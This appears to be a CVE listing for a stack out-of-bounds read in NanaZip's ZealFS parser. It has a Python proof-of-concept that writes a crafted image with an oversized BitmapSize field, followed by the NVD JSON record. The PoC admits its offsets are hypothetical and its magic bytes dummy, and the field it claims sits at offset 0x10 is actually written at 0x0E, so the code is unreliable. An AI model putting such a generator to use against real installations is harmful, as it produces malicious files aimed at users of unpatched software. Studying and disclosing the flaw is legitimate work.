CVE-2026-42446

import struct # PoC to generate a crafted ZealFS v1 image # Trigger: Stack-based out-of-bounds read via unbounded loop driven by BitmapSize def create_crafted_zealfs(filename): # Simulate a minimal ZealFS v1 header structure (Hypothetical offsets based on description) # Assuming offset 0x10 is BitmapSize (4 bytes integer) with open(filename, 'wb') as f: # Magic bytes (dummy) f.write(b'ZELA\x01\x00') f.write(b'\x00' * 8) # Padding # Craft BitmapSize field (Attacker controlled) # Set to a very large value to trigger the unbounded loop # e.g., 0xFFFFFFFF bitmap_size = 0xFFFFFFFF f.write(struct.pack('<I', bitmap_size)) # Fill the rest to make it a valid file size f.write(b'\x00' * 100) if __name__ == "__main__": create_crafted_zealfs("exploit_zealfs.bin") print("Crafted ZealFS image generated: exploit_zealfs.bin")

{"cve": {"id": "CVE-2026-42446", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:41.900", "lastModified": "2026-05-14T15:49:25.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanaZip is an open source file archive. From 5.0.1252.0 to before 6.0.1698.0, a stack-based out-of-bounds read exists in the ZealFS filesystem image parser in NanaZip. The vulnerability is triggered when opening a crafted ZealFS v1 filesystem image. An attacker-controlled BitmapSize field in the file header drives an unbounded loop that reads past the end of a stack-allocated ZEALFS_V1_HEADER structure. This vulnerability is fixed in 6.0.1698.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:m2team:nanazip:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.1252.0", "versionEndExcluding": "6.0.1698.0", "matchCriteriaId": "60D88926-2653-48FD-A4FE-B8CB8EB39E55"}]}]}], "references": [{"url": "https://github.com/M2Team/NanaZip/security/advisories/GHSA-4c79-hfr4-mqv9", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}